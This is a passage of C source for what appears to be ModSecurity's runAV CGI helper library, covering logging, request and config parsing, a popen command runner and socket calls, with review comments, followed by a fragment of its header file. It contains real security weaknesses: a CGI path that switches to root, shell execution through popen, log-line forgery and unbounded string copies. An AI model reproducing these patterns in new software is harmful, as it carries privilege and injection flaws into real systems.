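    if ((fd = open(filename, O_RDONLY | O_CREAT, S_IRWXU)) < 0) {
        /* Report the file that actually failed, not the log file. */
        print_error("lock_file", "open", filename, errno);
        return -1;
    }
    if (flock(fd, LOCK_EX) < 0) {
        /* Never hand back a descriptor the caller would believe is locked. */
        saved_errno = errno;
        close(fd);
        print_error("lock_file", "flock", filename, saved_errno);
        return -1;
    }
    return fd;
}

/*
 * Release the flock() held on fd.  Always returns 0.
 * NOTE(review): the descriptor is not closed here -- presumably the caller
 * closes it; confirm, otherwise every lock/unlock pair leaks a descriptor.
 */
int unlock_file(int fd)
{
    flock(fd, LOCK_UN);
    return 0;
}

/*
 * When the configured log level is DEBUG, append a description of the request
 * (URL, command and every parameter) to modsec_rpc_log_file, falling back to
 * stderr (fd 2) if the log cannot be opened.  The value of the parameter at
 * index `mask` is replaced by "XXXXXXX" so it never reaches the log.
 * Always returns 0.
 *
 * NOTE(review): names and values are written verbatim.  If they can carry
 * CR/LF from a client, a request can forge extra log lines (including the
 * REQUEST-BEGIN/END markers); consider escaping control characters.
 */
int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask)
{
    char time_str[64], line[1024*1024];
    int fd;
    int i;

    if (atoi(modsec_rpc_log_level) != DEBUG)
        return 0;

    log_timestamp(time_str);
    if ((fd = open(modsec_rpc_log_file, O_WRONLY | O_CREAT | O_APPEND | O_SYNC, S_IRWXU)) < 0) {
        print_error("print_request", "open", modsec_rpc_log_file, errno);
        fd = 2;
    }
    flock(fd, LOCK_EX);

    /* snprintf always NUL-terminates, so no manual terminator is needed. */
    snprintf(line, sizeof line, "%s:REQUEST-BEGIN:======================================\n", time_str);
    write(fd, line, strlen(line));
    /* A NULL url/command is logged as empty rather than passed to %s. */
    snprintf(line, sizeof line, "URL:%s\nCommand:%s\n", url ? url : "", command ? command : "");
    write(fd, line, strlen(line));

    for (i = 0; i < num_of_parameters; i++) {
        snprintf(line, sizeof line, "%s=", parameters[i].name);
        write(fd, line, strlen(line));
        if (i == mask)
            snprintf(line, sizeof line, "XXXXXXX\n");
        else if (parameters[i].value)
            snprintf(line, sizeof line, "%s\n", parameters[i].value);
        else
            snprintf(line, sizeof line, "\n");
        write(fd, line, strlen(line));
    }

    snprintf(line, sizeof line, "%s:REQUEST-END:========================================\n", time_str);
    write(fd, line, strlen(line));
    flock(fd, LOCK_UN);
    if (fd != 2)
        close(fd);
    return 0;
}

/*
 * Log the request regardless of the configured level by temporarily setting
 * modsec_rpc_log_level to "1" (presumably the DEBUG level -- confirm) around
 * a print_request() call, then restoring it.  Always returns 0.
 */
int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask)
{
    char real_level[1024];

    /* Bounded copy: the size of the global is not visible from here. */
    strncpy(real_level, modsec_rpc_log_level, sizeof real_level - 1);
    real_level[sizeof real_level - 1] = '\0';
    strcpy(modsec_rpc_log_level, "1");
    print_request(url, command, parameters, num_of_parameters, mask);
    strcpy(modsec_rpc_log_level, real_level);
    return 0;
}

/*
 * Write the reply to stdout and, at DEBUG level, append it to the log file
 * (stderr if the log cannot be opened).  Always returns 0.
 */
int print_reply(char *reply)
{
    int fd;

    if (!reply)
        return 0;
    printf("%s", reply);
    if (atoi(modsec_rpc_log_level) != DEBUG)
        return 0;

    if ((fd = open(modsec_rpc_log_file, O_WRONLY | O_CREAT | O_APPEND | O_SYNC, S_IRWXU)) < 0) {
        /* Name this function in the error record. */
        print_error("print_reply", "open", modsec_rpc_log_file, errno);
        fd = 2;
    }
    flock(fd, LOCK_EX);
    write(fd, reply, strlen(reply));
    flock(fd, LOCK_UN);
    if (fd != 2)
        close(fd);
    return 0;
}

/*
 * Append one "<time>:ERROR:<func1>:<func2>:<strerror(err)>:<str>" record to
 * the log file, or to stderr if the log cannot be opened.  NULL strings and
 * err == 0 produce empty fields; each field is limited to 1023 characters.
 * Always returns 0.
 */
int print_error(char *func1, char* func2, char* str, int err)
{
    char time_str[64], line[8192];
    int fd;

    log_timestamp(time_str);
    if ((fd = open(modsec_rpc_log_file, O_WRONLY | O_CREAT | O_APPEND | O_SYNC, S_IRWXU)) < 0) {
        /* Cannot recurse into print_error here; report on stderr instead. */
        fprintf(stderr, "%s:ERROR:print_error:open:%s:%s\n", time_str, strerror(errno), modsec_rpc_log_file);
        fd = 2;
    }
    /* Precision-limited %s replaces the separate bounded copies. */
    snprintf(line, sizeof line, "%s:ERROR:%.1023s:%.1023s:%.1023s:%.1023s\n",
             time_str,
             func1 ? func1 : "",
             func2 ? func2 : "",
             err ? strerror(err) : "",
             str ? str : "");
    flock(fd, LOCK_EX);
    write(fd, line, strlen(line));
    flock(fd, LOCK_UN);
    if (fd != 2)
        close(fd);
    return 0;
}

/*
 * Return 1 if the PID stored in the modsec_proxy_pid file names a process
 * this process can signal, 0 otherwise (missing file, no PID, dead process,
 * or kill() failing for any reason, including lack of permission).
 */
int is_proxy_up()
{
    int pid = 0;
    FILE *fp;

    if ((fp = fopen(modsec_proxy_pid, "r")) == NULL)
        return 0;
    /* fscanf returns EOF (not 0) on an empty file, so require exactly one
     * conversion instead of testing for 0. */
    if (fscanf(fp, "%d", &pid) != 1) {
        print_error("is_proxy_up", "fscanf", "missing PID", 0);
        fclose(fp);
        return 0;
    }
    fclose(fp);
    /* Zero or negative values address process groups in kill(); reject. */
    if (pid <= 0 || kill(pid, 0))
        return 0;
    return 1;
}

/*
 * Run `command` and collect its standard output into `output` (at most
 * output_size - 1 characters plus the terminating NUL).  Output that does
 * not fit is read and discarded so the child is not left blocked on a full
 * pipe.  Returns 0 on success, -1 if the command could not be started.
 *
 * SECURITY: popen() hands the string to the shell.  Callers must pass only
 * fixed or strictly validated command lines, never request-derived text.
 */
int run_cmd(char *command, char *output, int output_size)
{
    char line[1024];
    char *dst = output;
    int room;
    FILE *fp;

    if (!command)
        return -1;
    if (output_size > 0 && output)
        output[0] = '\0';
    if (!(fp = popen(command, "r"))) {
        print_error("run_cmd", "popen", command, errno);
        return -1;
    }

    /* Characters that still fit in front of the terminating NUL. */
    room = (output && output_size > 0) ? output_size - 1 : 0;
    while (fgets(line, sizeof line, fp)) {
        if (room > 0) {
            size_t n = strlen(line);
            if (n > (size_t)room)
                n = (size_t)room;
            memcpy(dst, line, n);
            dst += n;
            *dst = '\0';
            room -= (int)n;
        }
        /* room == 0: keep draining the pipe without storing anything. */
    }
    pclose(fp);
    return 0;
}

/*
 * Return the index of the first parameter whose name contains
 * `parameter_name`, or -1 if there is none.
 * NOTE(review): this is a substring match (strstr), so a lookup can match a
 * longer name that merely contains the requested one.
 */
int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters)
{
    int i;

    if (!parameter_name || !parameters)
        return -1;
    for (i = 0; i < max_parameters; i++)
        if (strstr(parameters[i].name, parameter_name))
            return i;
    return -1;
}

/*
 * Read "name=value" pairs from a config file into `parameters`, ignoring
 * everything after a '#'.  Lines that do not parse, or whose name/value do
 * not fit, are skipped.  Returns the number of pairs stored (0 on error).
 */
int parse_file(char *filename, parameter_t *parameters, int max_parameters)
{
    char line[1024], name[1024], value[1024], *ptr;
    int i = 0;
    FILE *fp;

    if (!max_parameters || (parameters == NULL) || (filename == NULL)) {
        print_error("parse_file", "invalid input parameters", "none", 0);
        return 0;
    }
    if ((fp = fopen(filename, "r")) == NULL) {
        print_error("parse_file", "fopen", filename, errno);
        return 0;
    }

    while (i < max_parameters && fgets(line, sizeof line, fp)) {
        if ((ptr = strchr(line, '#')))
            *ptr = '\0';
        /* Parse into line-sized scratch buffers with explicit widths, then
         * copy only what fits; an unbounded %s straight into the record
         * could write past its fields. */
        if (sscanf(line, "%1023[^=]=%1023s", name, value) != 2)
            continue;
        /* Same capacity assumption as parse_cli(): the fields hold at least
         * MAX_NAME_LENGTH / MAX_VALUE_LENGTH bytes -- TODO confirm against
         * the parameter_t declaration. */
        if (strlen(name) >= MAX_NAME_LENGTH || strlen(value) >= MAX_VALUE_LENGTH)
            continue;
        strcpy(parameters[i].name, name);
        strcpy(parameters[i].value, value);
        i++;
    }
    fclose(fp);
    return i;
}

/* Append `text` to a growable NUL-terminated buffer; returns 0, or -1 when
 * memory cannot be obtained (the buffer is then left unchanged). */
static int append_text(char **buf, size_t *len, size_t *cap, const char *text)
{
    size_t add = strlen(text);

    if (*len + add + 1 > *cap) {
        size_t new_cap = *cap ? *cap * 2 : 4096;
        char *grown;

        while (new_cap < *len + add + 1)
            new_cap *= 2;
        if (!(grown = realloc(*buf, new_cap)))
            return -1;
        *buf = grown;
        *cap = new_cap;
    }
    memcpy(*buf + *len, text, add + 1);
    *len += add;
    return 0;
}

/*
 * Replace the value of every "name=value" line in `filename` whose name
 * equals parameter.name with parameter.value.  Returns 1 if at least one
 * line was replaced and the file was rewritten, 0 otherwise (the file is
 * left untouched when nothing matches or an error occurs before writing).
 *
 * The previous implementation scanned into uninitialised pointers and wrote
 * into the stream it was still reading, overwriting the following lines; the
 * new content is now built in memory and written back in one pass.
 * NOTE(review): the rewrite is not atomic -- a failure while writing can
 * leave a truncated file.
 */
int change_file(char *filename, parameter_t parameter)
{
    char line[1024], name[1024], value[1024];
    char *buf = NULL;
    size_t len = 0, cap = 0;
    int found = 0, failed = 0;
    FILE *fp;

    if (filename == NULL)
        return 0;
    if ((fp = fopen(filename, "r")) == NULL)
        return 0;

    while (!failed && fgets(line, sizeof line, fp)) {
        /* >= 1 so that "name=" with an empty value can still be replaced;
         * a line without '=' yields a name ending in '\n' and never
         * compares equal. */
        if (sscanf(line, "%1023[^=]=%1023s", name, value) >= 1
            && !strcmp(name, parameter.name)) {
            if (append_text(&buf, &len, &cap, name)
                || append_text(&buf, &len, &cap, "=")
                || append_text(&buf, &len, &cap, parameter.value)
                || append_text(&buf, &len, &cap, "\n"))
                failed = 1;
            else
                found = 1;
        }
        else if (append_text(&buf, &len, &cap, line))
            failed = 1;
    }
    if (ferror(fp))
        failed = 1;
    fclose(fp);

    if (failed || !found) {
        free(buf);
        return 0;
    }

    if ((fp = fopen(filename, "w")) == NULL) {
        free(buf);
        return 0;
    }
    if (fwrite(buf, 1, len, fp) != len)
        failed = 1;
    if (fclose(fp) == EOF)
        failed = 1;
    free(buf);
    return failed ? 0 : found;
}

/*
 * Copy a text file line by line.  Returns 1 on success, 0 on a NULL
 * argument, an open failure, or a read/write error (previously write
 * errors were not detected).
 */
int copy_file(char *src_file, char *dst_file)
{
    char line[1024];
    FILE *sfp, *dfp;
    int ok = 1;

    if (src_file == NULL || dst_file == NULL)
        return 0;
    if ((sfp = fopen(src_file, "r")) == NULL)
        return 0;
    if ((dfp = fopen(dst_file, "w")) == NULL) {
        fclose(sfp);
        return 0;
    }
    while (ok && fgets(line, sizeof line, sfp))
        if (fputs(line, dfp) == EOF)
            ok = 0;
    if (ferror(sfp))
        ok = 0;
    fclose(sfp);
    /* Buffered write errors surface at close. */
    if (fclose(dfp) == EOF)
        ok = 0;
    return ok;
}

/*
 * Percent-decode characters from src into dst until `stop` or the end of the
 * string, storing at most capacity - 1 characters plus a NUL.  Escapes that
 * decode to 0 (including non-hex digits) are dropped.  Input beyond the
 * capacity is skipped.  Returns the position just after the delimiter, or
 * the terminating NUL of src.
 */
static char *decode_field(char *src, char *dst, int capacity, char stop)
{
    char num[3];
    int len = 0;

    while (*src && (*src != stop) && (len < capacity - 1)) {
        if (*src == '%' && src[1] && src[2]) {
            num[0] = src[1];
            num[1] = src[2];
            num[2] = '\0';
            src += 3;
            *dst = (char)strtol(num, NULL, 16);
            if (*dst)
                dst++;
        }
        else
            *dst++ = *src++;
        len++;
    }
    *dst = '\0';
    while (*src && (*src != stop))
        src++;
    if (*src)
        src++;
    return src;
}

/*
 * Split a URL-encoded "name=value&name=value" string into `parameters`,
 * percent-decoding both parts.  Returns the number of pairs stored.
 *
 * Names and values are now limited to MAX_NAME_LENGTH - 1 and
 * MAX_VALUE_LENGTH - 1 characters: the earlier loop stored up to the full
 * MAX_* count and then a terminator one byte further, which overruns a field
 * of exactly MAX_* bytes (the size parse_cli() assumes -- TODO confirm
 * against the parameter_t declaration).
 */
int parse_query(char *query, parameter_t *parameters, int max_parameters)
{
    char *ptr;
    int i = 0;

    if (!max_parameters || (parameters == NULL) || (query == NULL))
        return 0;

    ptr = query;
    while ((i < max_parameters) && *ptr) {
        ptr = decode_field(ptr, parameters[i].name, MAX_NAME_LENGTH, '=');
        ptr = decode_field(ptr, parameters[i].value, MAX_VALUE_LENGTH, '&');
        i++;
    }
    return i;
}

/*
 * CGI entry point for parameters: parse QUERY_STRING when it is non-empty,
 * otherwise read CONTENT_LENGTH bytes of request body from stdin and parse
 * those.  Returns the number of parameters stored.
 *
 * NOTE(review): CONTENT_LENGTH is client-controlled and only bounded by what
 * malloc() will grant; presumably the web server enforces a body limit --
 * confirm.
 */
int parse_query_and_body (parameter_t *parameters, int max_parameters)
{
    char *query, *content_length_env;
    long content_length, body_len = 0, want, got = 1;
    int num_of_params;

    query = getenv("QUERY_STRING");
    if (query && *query)
        return(parse_query(query, parameters, max_parameters));

    content_length_env = getenv("CONTENT_LENGTH");
    if (!content_length_env || !*content_length_env)
        return 0;
    content_length = atol(content_length_env);
    /* A negative length would otherwise reach malloc() and the terminator
     * write below. */
    if (content_length <= 0)
        return 0;
    if (!(query = malloc((size_t)content_length + 1)))
        return 0;

    while ((body_len < content_length) && (got > 0)) {
        want = content_length - body_len;
        if (want > 1024)
            want = 1024;
        got = read(0, query + body_len, (size_t)want);
        if (got > 0)
            body_len += got;
    }
    query[body_len] = '\0';
    num_of_params = parse_query(query, parameters, max_parameters);
    free(query);
    return num_of_params;
}

/*
 * Parse "name=value" command-line arguments into `parameters`.  Arguments
 * without a non-empty name and value, or whose name is too long, are
 * skipped; an over-long value leaves the slot uncounted.  Returns the number
 * of parameters stored.
 *
 * The argument is measured before anything is copied; the earlier unbounded
 * sscanf() wrote into fixed stack buffers before the length checks ran.
 */
int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[])
{
    static const char blanks[] = " \t\n\v\f\r";
    const char *eq, *val;
    size_t name_len, value_len;
    int i, num_of_params = 0;

    for (i = 0; i < num_of_args && i < max_parameters; i++) {
        if (!args[i])
            continue;
        eq = strchr(args[i], '=');
        if (!eq || eq == args[i])
            continue;
        name_len = (size_t)(eq - args[i]);
        /* Like scanf's %s: skip leading blanks, take one blank-free run. */
        val = eq + 1;
        val += strspn(val, blanks);
        value_len = strcspn(val, blanks);
        if (!value_len)
            continue;

        if (name_len >= MAX_NAME_LENGTH)
            continue;
        memcpy(parameters[num_of_params].name, args[i], name_len);
        parameters[num_of_params].name[name_len] = '\0';

        if (value_len < MAX_VALUE_LENGTH) {
            memcpy(parameters[num_of_params].value, val, value_len);
            parameters[num_of_params].value[value_len] = '\0';
            num_of_params++;
        }
    }
    return num_of_params;
}

/*
 * Connect to ip:port over TCP, send `request`, and read the reply until the
 * peer closes the connection or the buffer is full.  `reply` receives at
 * most max_reply_size - 1 bytes plus a terminating NUL.  Returns the number
 * of reply bytes, or -1 on invalid arguments or any socket error.
 * NOTE(review): there is no read timeout; a peer that never closes keeps
 * the caller blocked.
 */
int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size)
{
    int sock, reply_len = 0, want;
    long port_num, request_len, got = 1;
    struct sockaddr_in servaddr;

    /* Validate before touching reply; it used to be written first. */
    if (reply && max_reply_size > 0)
        reply[0] = '\0';
    if (!request || !*request || !ip || !port || !reply || max_reply_size <= 0)
        return -1;

    port_num = atol(port);
    if (port_num <= 0 || port_num > 65535)
        return -1;

    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons((unsigned short)port_num);
    if (inet_aton(ip, &servaddr.sin_addr) <= 0)
        return -1;

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        print_error("send_request", "socket", ip, errno);
        return -1;
    }
    if (connect(sock, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0) {
        print_error("send_request", "connect", ip, errno);
        close(sock);
        return -1;
    }

    request_len = (long)strlen(request);
    if (write(sock, request, (size_t)request_len) < request_len) {
        print_error("send_request", "write", ip, errno);
        shutdown(sock, SHUT_RDWR);
        close(sock);
        return -1;
    }

    /* Stop one byte short of the buffer so the terminator always fits. */
    while ((reply_len < max_reply_size - 1) && (got > 0)) {
        want = max_reply_size - 1 - reply_len;
        if (want > 1024)
            want = 1024;
        got = read(sock, reply + reply_len, (size_t)want);
        if (got > 0)
            reply_len += (int)got;
    }
    reply[reply_len] = '\0';

    shutdown(sock, SHUT_RDWR);
    close(sock);
    return reply_len;
}

/*
 * Return the index of the first blocklist entry whose ip field contains
 * `ip`, or -1 if there is none.
 * NOTE(review): strstr() is a substring match, so looking up "10.0.0.1"
 * also matches an entry for "10.0.0.10"; an exact comparison is probably
 * intended -- confirm the format of the ip field before changing it.
 */
int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips)
{
    int i;

    if (!ip || !blocklist)
        return -1;
    for (i = 0; i < num_of_ips; i++)
        if (strstr(blocklist[i].ip, ip))
            return i;
    return -1;
}

/*
 * Remove blocklist entries by shifting later entries down.  With a non-NULL
 * `ip`, entries whose ip field contains it are removed; with ip == NULL,
 * entries whose end time has passed are removed.  Returns the index at which
 * the last removal happened, or -1 if nothing was removed.
 *
 * NOTE(review): behaviour is kept as it was.  num_of_ips is passed by value,
 * so the caller cannot learn how many entries were removed, and the entry
 * shifted into slot i is not re-examined, so the second of two adjacent
 * matches survives the call.  The ip comparison is a substring match, as in
 * find_ip_idx().
 */
int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips)
{
    int i, j, idx = -1;
    time_t t;

    time(&t);
    for (i = 0; i < num_of_ips; i++) {
        int matches = ip ? (strstr(blocklist[i].ip, ip) != NULL)
                         : (t > blocklist[i].end);

        if (!matches)
            continue;
        idx = i;
        for (j = i; j < (num_of_ips - 1); j++) {
            strcpy(blocklist[j].ip, blocklist[j+1].ip);
            blocklist[j].start = blocklist[j+1].start;
            blocklist[j].duration = blocklist[j+1].duration;
            blocklist[j].end = blocklist[j+1].end;
            strcpy(blocklist[j].token, blocklist[j+1].token);
        }
        num_of_ips--;
    }
    return idx;
}

/* read_conf_file is reproduced unchanged; its body continues below. */
int read_conf_file (char *filename) { int idx, num_of_params; parameter_t parameters[MAX_PARAMS]; num_of_params=parse_file(filename,parameters,MAX_PARAMS); if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_cli_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_file,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_level,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) 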
strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_level,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ip,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_port,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_network_prefix,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_bin,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_conf,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ext_nic,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_pid,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_whitelist,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_blacklist,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_timeout,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_exchange,parameters[idx].value); if ((idx = 
find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ext_ips,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_admin,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_password_file,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_port,parameters[idx].value); if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) strcpy(sensor_id,parameters[idx].value); if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) strcpy(serial,parameters[idx].value); if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) strcpy(version_number,parameters[idx].value); if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) strcpy(release_date,parameters[idx].value); if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) strcpy(bridge_mode,parameters[idx].value); if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) strcpy(data_disk_space,parameters[idx].value); if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) strcpy(conn_rate,parameters[idx].value); if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) strcpy(conn_rate_per_addr,parameters[idx].value); if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) strcpy(conns,parameters[idx].value); if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) strcpy(conns_per_addr,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) strcpy(modsec_rpc,parameters[idx].value); if ((idx = 
find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) strcpy(modsec_proxy,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_script,parameters[idx].value); return num_of_params; } int init_cgi() { char *modsec; setresuid(0,0,0); setresgid(0,0,0); strcpy(modsec_cli_home,"/opt/modsecurity-cli"); strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); strcpy(modsec_rpc_log_level,"0"); strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); strcpy(modsec_proxy_ip,"127.0.0.2"); strcpy(modsec_proxy_port,"80"); strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); strcpy(modsec_proxy_conf,"/etc/httpd.conf"); strcpy(modsec_proxy_ext_nic,"eth0"); strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); strcpy(modsec_proxy_timeout,"120"); strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); strcpy(modsec_mui_ui_port,"443"); strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); strcpy(modsec_mui_ui_admin,"admin"); strcpy(sensor_id,"1"); strcpy(serial,"1"); strcpy(version_number,"2.0"); strcpy(bridge_mode,"off"); strcpy(data_disk_space,"60"); 
strcpy(release_date,"11-15-2006"); strcpy(conn_rate,"0"); strcpy(conn_rate_per_addr,"0"); strcpy(conns,"0"); strcpy(conns_per_addr,"0"); if (modsec = getenv("MODSEC")) read_conf_file(modsec); else { if (!read_conf_file("/opt/breach/etc/modsec.conf")) read_conf_file("/etc/modsec.conf"); } return 0; } �����������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/common.h����������������������������0000775�0000000�0000000�00000006765�12164572564�0026422�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <arpa/inet.h> #include <unistd.h> #include <dirent.h> #include <time.h> #include <fcntl.h> #include <crypt.h> #define MAX_PARAMS 256 #define MAX_IPS 256 #define MAX_NAME_LENGTH 256 #define MAX_VALUE_LENGTH 1024 #define MAX_CMD_LENGTH 1024 #define MAX_TOKEN_LENGTH 1024 #define MAX_OUTPUT_LINE_LEN (1024) #define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) #define WHITE 1 #define BLACK 0 #define NONE 0 #define DEBUG 1 typedef struct { char name[MAX_NAME_LENGTH]; char value[MAX_VALUE_LENGTH]; } parameter_t; typedef struct { char ip[16]; time_t start; long duration; time_t end; char token[MAX_TOKEN_LENGTH]; } blocklist_t; EXTERN int lock_file(char *filename); EXTERN int unlock_file(int fd); EXTERN int print_reply(char *reply); EXTERN int print_error(char *func1, char* func2, char* str, int err); EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN 
int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int is_proxy_up(); EXTERN int run_cmd(char *command, char *output, int output_size); EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); EXTERN int copy_file(char *src_file, char *dst_file); EXTERN int change_file(char *filename, parameter_t parameter); EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); EXTERN int init_cgi(); EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN char modsec_rpc[1024]; EXTERN char modsec_rpc_home[1024]; EXTERN char modsec_rpc_log_file[1024]; EXTERN char modsec_rpc_log_level[1024]; EXTERN char modsec_rpc_ssl_lockfile[1024]; EXTERN char modsec_rpc_externalnic_lockfile[1024]; EXTERN char modsec_rpc_sensor_lockfile[1024]; EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; EXTERN char modsec_rpc_mui_lockfile[1024]; EXTERN char modsec_proxy[1024]; EXTERN char modsec_proxy_home[1024]; EXTERN char modsec_proxy_script[1024]; EXTERN char modsec_proxy_ip[1024]; EXTERN char modsec_proxy_port[1024]; EXTERN char modsec_proxy_bin[1024]; EXTERN char modsec_proxy_conf[1024]; EXTERN char modsec_proxy_ext_nic[1024]; EXTERN char modsec_proxy_pid[1024]; EXTERN char modsec_proxy_whitelist[1024]; EXTERN char modsec_proxy_blacklist[1024]; EXTERN char modsec_proxy_network_prefix[1024]; EXTERN char modsec_proxy_timeout[1024]; EXTERN char 